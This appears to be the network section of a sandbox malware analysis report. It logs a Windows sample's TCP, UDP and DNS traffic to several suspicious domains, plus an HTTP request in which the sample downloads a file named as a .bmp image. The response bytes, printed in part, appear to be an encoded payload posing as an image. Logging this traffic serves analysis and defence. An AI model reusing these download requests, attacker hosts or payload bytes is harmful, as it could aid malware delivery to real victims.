                              Aug 27, 2024 09:49:20.190541029 CEST6138280192.168.2.5188.114.97.3
                              Aug 27, 2024 09:49:20.190757990 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:49:20.503576040 CEST44361384104.21.17.45192.168.2.5
                              Aug 27, 2024 09:49:20.503741026 CEST61384443192.168.2.5104.21.17.45
                              Aug 27, 2024 09:49:20.505894899 CEST61384443192.168.2.5104.21.17.45
                              Aug 27, 2024 09:49:20.505906105 CEST44361384104.21.17.45192.168.2.5
                              Aug 27, 2024 09:49:20.506227970 CEST44361384104.21.17.45192.168.2.5
                              Aug 27, 2024 09:49:20.546909094 CEST61384443192.168.2.5104.21.17.45
                              Aug 27, 2024 09:49:20.566659927 CEST61384443192.168.2.5104.21.17.45
                              Aug 27, 2024 09:49:20.566678047 CEST61384443192.168.2.5104.21.17.45
                              Aug 27, 2024 09:49:20.566832066 CEST44361384104.21.17.45192.168.2.5
                              Aug 27, 2024 09:49:21.565784931 CEST44361384104.21.17.45192.168.2.5
                              Aug 27, 2024 09:49:21.565893888 CEST44361384104.21.17.45192.168.2.5
                              Aug 27, 2024 09:49:21.566070080 CEST61384443192.168.2.5104.21.17.45
                              Aug 27, 2024 09:49:21.596923113 CEST61384443192.168.2.5104.21.17.45
                              Aug 27, 2024 09:49:21.596951008 CEST44361384104.21.17.45192.168.2.5
                              Aug 27, 2024 09:49:21.596966028 CEST61384443192.168.2.5104.21.17.45
                              Aug 27, 2024 09:49:21.596971035 CEST44361384104.21.17.45192.168.2.5
                              Aug 27, 2024 09:49:21.722441912 CEST61385443192.168.2.5104.26.6.127
                              Aug 27, 2024 09:49:21.722464085 CEST44361385104.26.6.127192.168.2.5
                              Aug 27, 2024 09:49:21.722573042 CEST61385443192.168.2.5104.26.6.127
                              Aug 27, 2024 09:49:21.722886086 CEST61385443192.168.2.5104.26.6.127
                              Aug 27, 2024 09:49:21.722897053 CEST44361385104.26.6.127192.168.2.5
                              Aug 27, 2024 09:49:22.202563047 CEST44361385104.26.6.127192.168.2.5
                              Aug 27, 2024 09:49:22.202661037 CEST61385443192.168.2.5104.26.6.127
                              Aug 27, 2024 09:49:22.232846975 CEST61385443192.168.2.5104.26.6.127
                              Aug 27, 2024 09:49:22.232896090 CEST44361385104.26.6.127192.168.2.5
                              Aug 27, 2024 09:49:22.233308077 CEST44361385104.26.6.127192.168.2.5
                              Aug 27, 2024 09:49:22.238208055 CEST61385443192.168.2.5104.26.6.127
                              Aug 27, 2024 09:49:22.238226891 CEST61385443192.168.2.5104.26.6.127
                              Aug 27, 2024 09:49:22.238234043 CEST44361385104.26.6.127192.168.2.5
                              Aug 27, 2024 09:49:22.941281080 CEST44361385104.26.6.127192.168.2.5
                              Aug 27, 2024 09:49:22.941528082 CEST44361385104.26.6.127192.168.2.5
                              Aug 27, 2024 09:49:22.941636086 CEST61385443192.168.2.5104.26.6.127
                              Aug 27, 2024 09:49:22.941766024 CEST61385443192.168.2.5104.26.6.127
                              Aug 27, 2024 09:49:22.941786051 CEST44361385104.26.6.127192.168.2.5
                              Aug 27, 2024 09:49:22.941798925 CEST61385443192.168.2.5104.26.6.127
                              Aug 27, 2024 09:49:22.941803932 CEST44361385104.26.6.127192.168.2.5
                              Aug 27, 2024 09:49:22.949538946 CEST61386443192.168.2.5104.26.6.127
                              Aug 27, 2024 09:49:22.949565887 CEST44361386104.26.6.127192.168.2.5
                              Aug 27, 2024 09:49:22.949659109 CEST61386443192.168.2.5104.26.6.127
                              Aug 27, 2024 09:49:22.949978113 CEST61386443192.168.2.5104.26.6.127
                              Aug 27, 2024 09:49:22.949991941 CEST44361386104.26.6.127192.168.2.5
                              Aug 27, 2024 09:49:23.573615074 CEST44361386104.26.6.127192.168.2.5
                              Aug 27, 2024 09:49:23.573772907 CEST61386443192.168.2.5104.26.6.127
                              Aug 27, 2024 09:49:23.575110912 CEST61386443192.168.2.5104.26.6.127
                              Aug 27, 2024 09:49:23.575125933 CEST44361386104.26.6.127192.168.2.5
                              Aug 27, 2024 09:49:23.575414896 CEST44361386104.26.6.127192.168.2.5
                              Aug 27, 2024 09:49:23.576642990 CEST61386443192.168.2.5104.26.6.127
                              Aug 27, 2024 09:49:23.576668978 CEST61386443192.168.2.5104.26.6.127
                              Aug 27, 2024 09:49:23.576719046 CEST44361386104.26.6.127192.168.2.5
                              Aug 27, 2024 09:49:24.235122919 CEST44361386104.26.6.127192.168.2.5
                              Aug 27, 2024 09:49:24.235209942 CEST44361386104.26.6.127192.168.2.5
                              Aug 27, 2024 09:49:24.235317945 CEST61386443192.168.2.5104.26.6.127
                              Aug 27, 2024 09:49:24.235521078 CEST61386443192.168.2.5104.26.6.127
                              Aug 27, 2024 09:49:24.235547066 CEST44361386104.26.6.127192.168.2.5
                              Aug 27, 2024 09:49:24.235563993 CEST61386443192.168.2.5104.26.6.127
                              Aug 27, 2024 09:49:24.235572100 CEST44361386104.26.6.127192.168.2.5
                              Aug 27, 2024 09:49:33.255136967 CEST61387443192.168.2.5104.26.6.127
                              Aug 27, 2024 09:49:33.255198956 CEST44361387104.26.6.127192.168.2.5
                              Aug 27, 2024 09:49:33.255485058 CEST61387443192.168.2.5104.26.6.127
                              Aug 27, 2024 09:49:33.255903006 CEST61387443192.168.2.5104.26.6.127
                              Aug 27, 2024 09:49:33.255913019 CEST44361387104.26.6.127192.168.2.5
                              Aug 27, 2024 09:49:33.866107941 CEST44361387104.26.6.127192.168.2.5
                              Aug 27, 2024 09:49:33.866228104 CEST61387443192.168.2.5104.26.6.127
                              Aug 27, 2024 09:49:33.867568970 CEST61387443192.168.2.5104.26.6.127
                              Aug 27, 2024 09:49:33.867574930 CEST44361387104.26.6.127192.168.2.5
                              Aug 27, 2024 09:49:33.867789984 CEST44361387104.26.6.127192.168.2.5
                              Aug 27, 2024 09:49:33.868954897 CEST61387443192.168.2.5104.26.6.127
                              Aug 27, 2024 09:49:33.868972063 CEST61387443192.168.2.5104.26.6.127
                              Aug 27, 2024 09:49:33.869014025 CEST44361387104.26.6.127192.168.2.5
                              Aug 27, 2024 09:49:34.526495934 CEST44361387104.26.6.127192.168.2.5
                              Aug 27, 2024 09:49:34.526583910 CEST44361387104.26.6.127192.168.2.5
                              Aug 27, 2024 09:49:34.526645899 CEST61387443192.168.2.5104.26.6.127
                              Aug 27, 2024 09:49:34.526808023 CEST61387443192.168.2.5104.26.6.127
                              Aug 27, 2024 09:49:34.526820898 CEST44361387104.26.6.127192.168.2.5
                              Aug 27, 2024 09:49:34.526838064 CEST61387443192.168.2.5104.26.6.127
                              Aug 27, 2024 09:49:34.526844025 CEST44361387104.26.6.127192.168.2.5
                              Aug 27, 2024 09:49:39.540595055 CEST61388443192.168.2.5104.26.6.127
                              Aug 27, 2024 09:49:39.540633917 CEST44361388104.26.6.127192.168.2.5
                              Aug 27, 2024 09:49:39.540723085 CEST61388443192.168.2.5104.26.6.127
                              Aug 27, 2024 09:49:39.541028023 CEST61388443192.168.2.5104.26.6.127
                              Aug 27, 2024 09:49:39.541038036 CEST44361388104.26.6.127192.168.2.5
                              Aug 27, 2024 09:49:39.999860048 CEST44361388104.26.6.127192.168.2.5
                              Aug 27, 2024 09:49:40.000025034 CEST61388443192.168.2.5104.26.6.127
                              Aug 27, 2024 09:49:40.001477003 CEST61388443192.168.2.5104.26.6.127
                              Aug 27, 2024 09:49:40.001487017 CEST44361388104.26.6.127192.168.2.5
                              Aug 27, 2024 09:49:40.001718044 CEST44361388104.26.6.127192.168.2.5
                              Aug 27, 2024 09:49:40.003000975 CEST61388443192.168.2.5104.26.6.127
                              Aug 27, 2024 09:49:40.003022909 CEST61388443192.168.2.5104.26.6.127
                              Aug 27, 2024 09:49:40.003060102 CEST44361388104.26.6.127192.168.2.5
                              Aug 27, 2024 09:49:40.832302094 CEST44361388104.26.6.127192.168.2.5
                              Aug 27, 2024 09:49:40.832437038 CEST44361388104.26.6.127192.168.2.5
                              Aug 27, 2024 09:49:40.832501888 CEST61388443192.168.2.5104.26.6.127
                              Aug 27, 2024 09:49:40.832602978 CEST61388443192.168.2.5104.26.6.127
                              Aug 27, 2024 09:49:40.832623959 CEST44361388104.26.6.127192.168.2.5
                              Aug 27, 2024 09:49:40.832636118 CEST61388443192.168.2.5104.26.6.127
                              Aug 27, 2024 09:49:40.832640886 CEST44361388104.26.6.127192.168.2.5
                              Aug 27, 2024 09:49:47.848104000 CEST61389443192.168.2.5104.26.6.127
                              Aug 27, 2024 09:49:47.848154068 CEST44361389104.26.6.127192.168.2.5
                              Aug 27, 2024 09:49:47.848249912 CEST61389443192.168.2.5104.26.6.127
                              Aug 27, 2024 09:49:47.848613977 CEST61389443192.168.2.5104.26.6.127
                              Aug 27, 2024 09:49:47.848624945 CEST44361389104.26.6.127192.168.2.5
                              Aug 27, 2024 09:49:48.338979006 CEST44361389104.26.6.127192.168.2.5
                              Aug 27, 2024 09:49:48.339113951 CEST61389443192.168.2.5104.26.6.127
                              Aug 27, 2024 09:49:48.340527058 CEST61389443192.168.2.5104.26.6.127
                              Aug 27, 2024 09:49:48.340532064 CEST44361389104.26.6.127192.168.2.5
                              Aug 27, 2024 09:49:48.340754986 CEST44361389104.26.6.127192.168.2.5
                              Aug 27, 2024 09:49:48.342047930 CEST61389443192.168.2.5104.26.6.127
                              Aug 27, 2024 09:49:48.342075109 CEST61389443192.168.2.5104.26.6.127
                              Aug 27, 2024 09:49:48.342108965 CEST44361389104.26.6.127192.168.2.5
                              Aug 27, 2024 09:49:49.005450964 CEST44361389104.26.6.127192.168.2.5
                              Aug 27, 2024 09:49:49.005538940 CEST44361389104.26.6.127192.168.2.5
                              Aug 27, 2024 09:49:49.005610943 CEST61389443192.168.2.5104.26.6.127
                              Aug 27, 2024 09:49:49.005841970 CEST61389443192.168.2.5104.26.6.127
                              Aug 27, 2024 09:49:49.005856037 CEST44361389104.26.6.127192.168.2.5
                              Aug 27, 2024 09:49:49.005867958 CEST61389443192.168.2.5104.26.6.127
                              Aug 27, 2024 09:49:49.005872965 CEST44361389104.26.6.127192.168.2.5
                              Aug 27, 2024 09:49:55.020503998 CEST61390443192.168.2.5104.26.6.127
                              Aug 27, 2024 09:49:55.020555973 CEST44361390104.26.6.127192.168.2.5
                              Aug 27, 2024 09:49:55.020669937 CEST61390443192.168.2.5104.26.6.127
                              Aug 27, 2024 09:49:55.021011114 CEST61390443192.168.2.5104.26.6.127
                              Aug 27, 2024 09:49:55.021022081 CEST44361390104.26.6.127192.168.2.5
                              Aug 27, 2024 09:49:56.403932095 CEST44361390104.26.6.127192.168.2.5
                              Aug 27, 2024 09:49:56.404149055 CEST61390443192.168.2.5104.26.6.127
                              Aug 27, 2024 09:49:56.405782938 CEST61390443192.168.2.5104.26.6.127
                              Aug 27, 2024 09:49:56.405788898 CEST44361390104.26.6.127192.168.2.5
                              Aug 27, 2024 09:49:56.406002998 CEST44361390104.26.6.127192.168.2.5
                              Aug 27, 2024 09:49:56.407268047 CEST61390443192.168.2.5104.26.6.127
                              Aug 27, 2024 09:49:56.407288074 CEST61390443192.168.2.5104.26.6.127
                              Aug 27, 2024 09:49:56.407325983 CEST44361390104.26.6.127192.168.2.5
                              Aug 27, 2024 09:49:57.101811886 CEST44361390104.26.6.127192.168.2.5
                              Aug 27, 2024 09:49:57.101910114 CEST44361390104.26.6.127192.168.2.5
                              Aug 27, 2024 09:49:57.101993084 CEST61390443192.168.2.5104.26.6.127
                              Aug 27, 2024 09:49:57.102181911 CEST61390443192.168.2.5104.26.6.127
                              Aug 27, 2024 09:49:57.102196932 CEST44361390104.26.6.127192.168.2.5
                              Aug 27, 2024 09:49:57.102232933 CEST61390443192.168.2.5104.26.6.127
                              Aug 27, 2024 09:49:57.102237940 CEST44361390104.26.6.127192.168.2.5
                              Aug 27, 2024 09:50:03.114835978 CEST61391443192.168.2.5104.26.6.127
                              Aug 27, 2024 09:50:03.114857912 CEST44361391104.26.6.127192.168.2.5
                              Aug 27, 2024 09:50:03.114929914 CEST61391443192.168.2.5104.26.6.127
                              Aug 27, 2024 09:50:03.115305901 CEST61391443192.168.2.5104.26.6.127
                              Aug 27, 2024 09:50:03.115314007 CEST44361391104.26.6.127192.168.2.5
                              Aug 27, 2024 09:50:03.763900995 CEST44361391104.26.6.127192.168.2.5
                              Aug 27, 2024 09:50:03.764019966 CEST61391443192.168.2.5104.26.6.127
                              Aug 27, 2024 09:50:03.765914917 CEST61391443192.168.2.5104.26.6.127
                              Aug 27, 2024 09:50:03.765922070 CEST44361391104.26.6.127192.168.2.5
                              Aug 27, 2024 09:50:03.766124010 CEST44361391104.26.6.127192.168.2.5
                              Aug 27, 2024 09:50:03.770818949 CEST61391443192.168.2.5104.26.6.127
                              Aug 27, 2024 09:50:03.772358894 CEST61391443192.168.2.5104.26.6.127
                              Aug 27, 2024 09:50:03.772380114 CEST44361391104.26.6.127192.168.2.5
                              Aug 27, 2024 09:50:04.420814991 CEST44361391104.26.6.127192.168.2.5
                              Aug 27, 2024 09:50:04.420903921 CEST44361391104.26.6.127192.168.2.5
                              Aug 27, 2024 09:50:04.420999050 CEST61391443192.168.2.5104.26.6.127
                              Aug 27, 2024 09:50:04.429630041 CEST61391443192.168.2.5104.26.6.127
                              Aug 27, 2024 09:50:04.429646015 CEST44361391104.26.6.127192.168.2.5
                              Aug 27, 2024 09:50:04.429658890 CEST61391443192.168.2.5104.26.6.127
                              Aug 27, 2024 09:50:04.429663897 CEST44361391104.26.6.127192.168.2.5
                              Aug 27, 2024 09:50:10.441740036 CEST61392443192.168.2.5104.26.6.127
                              Aug 27, 2024 09:50:10.441792965 CEST44361392104.26.6.127192.168.2.5
                              Aug 27, 2024 09:50:10.441879988 CEST61392443192.168.2.5104.26.6.127
                              Aug 27, 2024 09:50:10.442213058 CEST61392443192.168.2.5104.26.6.127
                              Aug 27, 2024 09:50:10.442226887 CEST44361392104.26.6.127192.168.2.5
                              Aug 27, 2024 09:50:10.919761896 CEST44361392104.26.6.127192.168.2.5
                              Aug 27, 2024 09:50:10.919902086 CEST61392443192.168.2.5104.26.6.127
                              Aug 27, 2024 09:50:10.921276093 CEST61392443192.168.2.5104.26.6.127
                              Aug 27, 2024 09:50:10.921287060 CEST44361392104.26.6.127192.168.2.5
                              Aug 27, 2024 09:50:10.921526909 CEST44361392104.26.6.127192.168.2.5
                              Aug 27, 2024 09:50:10.923007965 CEST61392443192.168.2.5104.26.6.127
                              Aug 27, 2024 09:50:10.923022032 CEST61392443192.168.2.5104.26.6.127
                              Aug 27, 2024 09:50:10.923094034 CEST44361392104.26.6.127192.168.2.5
                              Aug 27, 2024 09:50:11.598504066 CEST44361392104.26.6.127192.168.2.5
                              Aug 27, 2024 09:50:11.598601103 CEST44361392104.26.6.127192.168.2.5
                              Aug 27, 2024 09:50:11.598670006 CEST61392443192.168.2.5104.26.6.127
                              Aug 27, 2024 09:50:11.598808050 CEST61392443192.168.2.5104.26.6.127
                              Aug 27, 2024 09:50:11.598831892 CEST44361392104.26.6.127192.168.2.5
                              Aug 27, 2024 09:50:11.598841906 CEST61392443192.168.2.5104.26.6.127
                              Aug 27, 2024 09:50:11.598846912 CEST44361392104.26.6.127192.168.2.5
                              Aug 27, 2024 09:50:17.668942928 CEST61393443192.168.2.5104.26.6.127
                              Aug 27, 2024 09:50:17.668989897 CEST44361393104.26.6.127192.168.2.5
                              Aug 27, 2024 09:50:17.669106007 CEST61393443192.168.2.5104.26.6.127
                              Aug 27, 2024 09:50:17.669425964 CEST61393443192.168.2.5104.26.6.127
                              Aug 27, 2024 09:50:17.669440031 CEST44361393104.26.6.127192.168.2.5
                              Aug 27, 2024 09:50:18.139453888 CEST44361393104.26.6.127192.168.2.5
                              Aug 27, 2024 09:50:18.139560938 CEST61393443192.168.2.5104.26.6.127
                              Aug 27, 2024 09:50:18.140885115 CEST61393443192.168.2.5104.26.6.127
                              Aug 27, 2024 09:50:18.140893936 CEST44361393104.26.6.127192.168.2.5
                              Aug 27, 2024 09:50:18.141133070 CEST44361393104.26.6.127192.168.2.5
                              Aug 27, 2024 09:50:18.142303944 CEST61393443192.168.2.5104.26.6.127
                              Aug 27, 2024 09:50:18.142319918 CEST61393443192.168.2.5104.26.6.127
                              Aug 27, 2024 09:50:18.142364979 CEST44361393104.26.6.127192.168.2.5
                              Aug 27, 2024 09:50:18.819128036 CEST44361393104.26.6.127192.168.2.5
                              Aug 27, 2024 09:50:18.819210052 CEST44361393104.26.6.127192.168.2.5
                              Aug 27, 2024 09:50:18.819298983 CEST61393443192.168.2.5104.26.6.127
                              Aug 27, 2024 09:50:18.819437027 CEST61393443192.168.2.5104.26.6.127
                              Aug 27, 2024 09:50:18.819454908 CEST44361393104.26.6.127192.168.2.5
                              Aug 27, 2024 09:50:18.819497108 CEST61393443192.168.2.5104.26.6.127
                              Aug 27, 2024 09:50:18.819503069 CEST44361393104.26.6.127192.168.2.5

                              UDP Packets

                              TimestampSource PortDest PortSource IPDest IP
                              Aug 27, 2024 09:47:35.601077080 CEST53546381.1.1.1192.168.2.5
                              Aug 27, 2024 09:47:49.101058006 CEST5354224162.159.36.2192.168.2.5
                              Aug 27, 2024 09:47:49.565877914 CEST5894153192.168.2.51.1.1.1
                              Aug 27, 2024 09:47:49.573285103 CEST53589411.1.1.1192.168.2.5
                              Aug 27, 2024 09:48:50.286338091 CEST5050553192.168.2.51.1.1.1
                              Aug 27, 2024 09:48:50.465806007 CEST53505051.1.1.1192.168.2.5
                              Aug 27, 2024 09:49:19.848243952 CEST5582953192.168.2.51.1.1.1
                              Aug 27, 2024 09:49:20.021440029 CEST53558291.1.1.1192.168.2.5
                              Aug 27, 2024 09:49:21.709008932 CEST5773453192.168.2.51.1.1.1
                              Aug 27, 2024 09:49:21.721499920 CEST53577341.1.1.1192.168.2.5

                              DNS Queries

                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                              Aug 27, 2024 09:47:49.565877914 CEST192.168.2.51.1.1.10xb601Standard query (0)15.164.165.52.in-addr.arpaPTR (Pointer record)IN (0x0001)false
                              Aug 27, 2024 09:48:50.286338091 CEST192.168.2.51.1.1.10x2bceStandard query (0)web.ad87h92j.comA (IP address)IN (0x0001)false
                              Aug 27, 2024 09:49:19.848243952 CEST192.168.2.51.1.1.10x3c39Standard query (0)cacer.goldenh0ur.comA (IP address)IN (0x0001)false
                              Aug 27, 2024 09:49:21.709008932 CEST192.168.2.51.1.1.10x231aStandard query (0)mvc.withoutyou5.comA (IP address)IN (0x0001)false

                              DNS Answers

                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                              Aug 27, 2024 09:47:49.573285103 CEST1.1.1.1192.168.2.50xb601Name error (3)15.164.165.52.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false
                              Aug 27, 2024 09:48:50.465806007 CEST1.1.1.1192.168.2.50x2bceNo error (0)web.ad87h92j.com188.114.97.3A (IP address)IN (0x0001)false
                              Aug 27, 2024 09:48:50.465806007 CEST1.1.1.1192.168.2.50x2bceNo error (0)web.ad87h92j.com188.114.96.3A (IP address)IN (0x0001)false
                              Aug 27, 2024 09:49:20.021440029 CEST1.1.1.1192.168.2.50x3c39No error (0)cacer.goldenh0ur.com104.21.17.45A (IP address)IN (0x0001)false
                              Aug 27, 2024 09:49:20.021440029 CEST1.1.1.1192.168.2.50x3c39No error (0)cacer.goldenh0ur.com172.67.222.6A (IP address)IN (0x0001)false
                              Aug 27, 2024 09:49:21.721499920 CEST1.1.1.1192.168.2.50x231aNo error (0)mvc.withoutyou5.com104.26.6.127A (IP address)IN (0x0001)false
                              Aug 27, 2024 09:49:21.721499920 CEST1.1.1.1192.168.2.50x231aNo error (0)mvc.withoutyou5.com172.67.72.137A (IP address)IN (0x0001)false
                              Aug 27, 2024 09:49:21.721499920 CEST1.1.1.1192.168.2.50x231aNo error (0)mvc.withoutyou5.com104.26.7.127A (IP address)IN (0x0001)false

                              HTTP Request Dependency Graph

                              • cacer.goldenh0ur.com
                              • mvc.withoutyou5.com
                              • web.ad87h92j.com

                              HTTP Packets

                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              0192.168.2.561382188.114.97.3806148C:\Users\user\Desktop\Rudvfa0Z17.exe
                              TimestampBytes transferredDirectionData
                              Aug 27, 2024 09:48:50.479897022 CEST77OUTGET /4/long.bmp HTTP/1.1
                              Host: web.ad87h92j.com
                              Cache-Control: no-cache
                              Aug 27, 2024 09:48:51.304615974 CEST1236INHTTP/1.1 200 OK
                              Date: Tue, 27 Aug 2024 07:48:51 GMT
                              Content-Type: image/bmp
                              Content-Length: 139784
                              Connection: keep-alive
                              Last-Modified: Fri, 09 Aug 2024 04:56:47 GMT
                              ETag: "b09db28918eada1:0"
                              Cache-Control: max-age=14400
                              CF-Cache-Status: MISS
                              Accept-Ranges: bytes
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jmJji3O%2BWXvXLprh0KgLg2M78gah0ZsHnTR%2FycZttm9Wlpz02ecIAC61NT%2F9kLJ1OKTAbyayS7%2FrAQCzpsGTJka%2Bs0LFLqzptarkD3kJhj5RAUwwLj20zkPF6dXA9QqKWEpy"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              CF-RAY: 8b9a762a08aa4255-EWR
                              alt-svc: h3=":443"; ma=86400
                              Data Raw: 84 6c 00 00 6c 34 55 89 89 e5 c2 05 93 67 00 00 ed ae ff 21 6e 6c 68 05 6c 6c 00 68 68 6c 00 00 3e 04 c0 1b c4 99 50 e8 69 6c 00 00 ef a8 14 c9 af ed ec 14 6d 6c 00 53 39 3a 57 6a 07 34 6a 65 0a e5 84 24 a0 6c 00 00 5f 81 58 6a 1e 35 6a 6e 37 06 6c 5a 06 5f 66 89 e8 48 ce 00 6c 6c 66 89 e8 48 d4 00 6c 6c 58 6a 5e 0a 89 84 48 b4 00 00 6c 34 6a 2e 0a e5 84 24 b6 6c 00 00 34 06 64 66 e5 e8 24 dc 6c 6c 00 58 e5 c0 24 b0 6c 6c 00 89 00 48 34 89 c0 48 b8 00 6c 6c 89 ac 48 a8 00 00 6c e5 ac 24 d8 6c 00 00 e5 c0 24 ac 6c 6c 00 89 c0 48 e0 00 6c 6c 66 89 e0 48 cc 00 6c 6c 66 89 f0 48 ce 00 6c 6c 66 89 f8 48 d2 00 6c 6c 66 89 e8 48 da 00 6c 6c 66 89 f8 48 dc 00 6c 6c 66 89 f8 48 de 00 6c 6c c6 44 48 50 53 88 38 48 3d 66 ab 28 24 3e 09 09 c6 44 48 2c 70 66 ab 28 24 50 20 03 c6 44 48 3e 61 88 28 48 53 66 ab 28 24 54 20 05 c6 44 48 3a 62 88 20 48 57 c6 28 48 58 61 e4 20 24 59 0a ab 44 24 36 15 41 66 ab 28 24 44 3a 05 88 4c 48 2a 66 c7 28 48 47 74 19 aa 44 24 25 0d 88 54 48 26 c6 44 48 27 41 88 38 48 4c 88 38 48 [TRUNCATED]
                              Data Ascii: ll4Ug!nlhllhhl>PilmlS9:Wj4je$l_Xj5jn7lZ_fHllfHllXj^Hl4j.$l4df$llX$llH4HllHl$l$llHllfHllfHllfHllfHllfHllfHllDHPS8H=f($>DH,pf($P DH>a(HSf($T DH:b HW(HXa $YD$6Af($D:LH*f(HGtD$%TH&DH'A8HL8HMf($Nf(H\VL$2DH3tu($aT$D$<LHDHotDHtHllFHllHlsh%$l$lHl$lti$lloYHllLHLHLHHlHl$l/ch($l+D$NaDHiv($u?stD$I
                              Aug 27, 2024 09:48:51.304636002 CEST1236INData Raw: 30 48 7c 66 ab 28 24 7d 0a 03 66 c7 e8 48 80 00 6c 6c 52 74 e4 f8 24 82 6c 6c 00 c6 e8 48 83 00 6c 6c 41 88 e8 48 84 00 6c 6c 88 84 48 e9 00 00 6c 0a c7 84 48 ea 00 00 6c 2a 75 88 f0 48 88 00 6c 6c c7 84 48 e5 00 00 6c 0f 74 69 03 e4 9c 24 e1 6c
                              Data Ascii: 0H|f($}fHllRt$llHllAHllHlHl*uHllHlti$l$l8HlHlwll-^kll$lljt$l4HlHlD$p<Hl\$X<UUj3D$(|HxDHtDHXPU($|$r<tHDbXf($D$zD$0D$t
                              Aug 27, 2024 09:48:51.304642916 CEST448INData Raw: 6c 9b f1 81 ab af 9e 26 6c 5f d2 89 d0 48 28 01 6c 6c 6a 05 e1 24 01 8b ab ad e8 10 e1 d0 24 f0 6c 6c 00 25 93 13 00 00 9b 9d 59 03 a9 07 c0 14 06 69 03 c6 29 e7 f0 f3 c9 35 8b f3 e7 94 8b 44 48 7c f3 a5 06 69 8b fb e1 d8 24 f0 6c 6c 00 59 9f c9
                              Data Ascii: l&l_H(llj$$ll%Yi)5DH|i$llYHDl$$W$llrl$D\$@llgD$T$TmP+`|H@cll<$lTHp7obt|$\yec9<jZn_$lTmt,-9lHllUf($D$vD
                              Aug 27, 2024 09:48:51.304771900 CEST1236INData Raw: e7 38 24 38 3a 0a 89 44 48 74 66 89 28 48 1a 8d 28 48 18 6a 6c e5 54 24 4c 3c 51 ff b9 ef c6 04 ef ab 04 83 52 6c 74 06 e7 20 24 1c 87 c1 8b 6c 48 7c 83 c5 4c e5 6c 24 7c e7 45 00 e9 ac 0f 85 18 93 ff ff e7 00 24 28 63 db 75 14 5f ac 83 c6 44 5f
                              Data Ascii: 8$8:DHtf(H(HjlT$L<QRlt $lH|Ll$|E$(cu_D_fW)loll@RlN%ll ugukxo,bu0uydQu txnAutyh1tJux|!t:uyl'jL4DHLtt
                              Aug 27, 2024 09:48:51.304783106 CEST1236INData Raw: 6c 6c 00 00 6c 6c 00 00 6c 6c 00 00 6c 2c 02 00 7c 7f 00 00 6c 6c 00 00 6c 6c 00 00 6c 6c 00 00 6c 6c 00 00 6c 6c 00 00 6c 6c 00 00 6c 6c 00 00 6c 6c 00 00 7c a2 01 00 2c 6c 00 00 6c 6c 00 00 6c 6c 00 00 6c ec 01 00 40 6e 00 00 6c 6c 00 00 6c 6c
                              Data Ascii: lllllll,|llllllllllllllll|,llllll@nllllllllllllBexll|llhllllllLl`Bda'lllllllll,l@Batl,\lll~lllllll,lBelsl,lLl
                              Aug 27, 2024 09:48:51.304791927 CEST1236INData Raw: 58 5c c7 85 48 93 ff ff 5d 41 30 30 ab e9 28 ff 93 93 30 30 41 5c c7 85 40 93 ff ff 5c 5c 30 2d ab e9 30 ff 93 93 43 30 5c 5c c7 85 58 93 ff ff 41 5c 30 30 ab e9 38 ff 93 93 30 30 5c 5c c7 85 50 93 ff ff 5c 5c 30 34 0a ab 85 40 93 93 ff 36 11 e4
                              Data Ascii: X\H]A00(00A\@\\0-0C0\\XA\00800\\P\\04@6BHSPSjl?SSPVfhmL?<Sy|ll?<l`O+mG:O+mG:
                              Aug 27, 2024 09:48:51.304805040 CEST1236INData Raw: 3c 93 15 b0 ec 6d 10 85 ac 19 26 85 9a 18 22 8b 6a e9 c0 74 6b 3c ff 15 e0 ed 01 10 e7 2a 04 85 ac 18 07 50 84 28 a1 00 6c 35 56 e8 17 cd 00 00 35 ef 27 00 32 af 51 ff 79 c8 81 01 7c af 55 8b 80 ef ec 20 cd dc 00 02 7c 5f c5 89 29 90 8d 45 84 3c
                              Data Ascii: <m&"jtk<*P(l5V5'2Qy|U |_)E<j(ym|Pyp|uh^9E<@m|jym|guTmElEElj))Pjlu)ll)llltmM_)U4nll_EE?;3?Pm
                              Aug 27, 2024 09:48:51.304862976 CEST328INData Raw: 3f 93 d6 8b 29 a8 53 89 29 b8 8b 45 a4 3f 6a 10 e5 29 d8 8d 29 bc 50 53 93 19 cc c7 29 bc 01 00 6c 6c c7 45 b0 6e 00 00 6c 93 15 00 ec 6d 10 85 ac 63 84 0c 6e 6c 00 8b 29 a0 89 45 dc e1 45 f4 3c 3b 53 ff ba e9 c0 74 61 e7 4d b0 e1 29 f4 50 84 2f
                              Data Ascii: ?)S)E?j))PS)llEnlmcnl)EE<;StaM)P/5}E<Tm|St`E<H5})P|?t)PY)Ph?)PYE<hmS`E<5}E<m|St`E<5}
                              Aug 27, 2024 09:48:51.304873943 CEST1236INData Raw: 84 27 fb ff 93 35 8b 7d a0 e1 45 f4 3c 04 08 a7 6d 7c 53 ff ba e9 c0 74 60 e1 45 f4 3c e7 cf e8 40 97 ff ff 35 e7 7d cc e1 29 f4 50 04 48 a7 01 7c 3f ff d6 e9 ac 74 0c e1 29 f4 50 e7 a3 e8 0d 97 93 ff 59 e7 11 cc 8d 29 98 50 68 2c cb 01 10 3f 93
                              Data Ascii: '5}E<m|St`E<@5})PH|?t)PY)Ph,?)PYE<h`mS`E<5}E<tm|St`E<5_3}E<f))1) llEmdP)Pjuuym|u=Tmu
                              Aug 27, 2024 09:48:51.304883003 CEST1236INData Raw: 14 9a ff ff 35 e7 7d cc e1 29 f4 50 04 ac a6 01 7c 3f ff d6 e9 ac 74 0c e1 29 f4 50 e7 a3 e8 59 9a 93 ff 59 e7 11 cc 8d 29 98 50 68 b8 ca 01 10 3f 93 d6 85 ac 18 0c 8d 29 98 50 8b a3 84 3a f6 93 93 59 8b 11 a0 8d 45 98 3c 68 e8 ca 6d 10 53 93 ba
                              Data Ascii: 5})P|?t)PYY)Ph?)P:YE<hmS`E<w5}E<m|St`E<5})PH|?t)PY)Ph,?)PYE<h`mS`E<5}E<tm|St`E
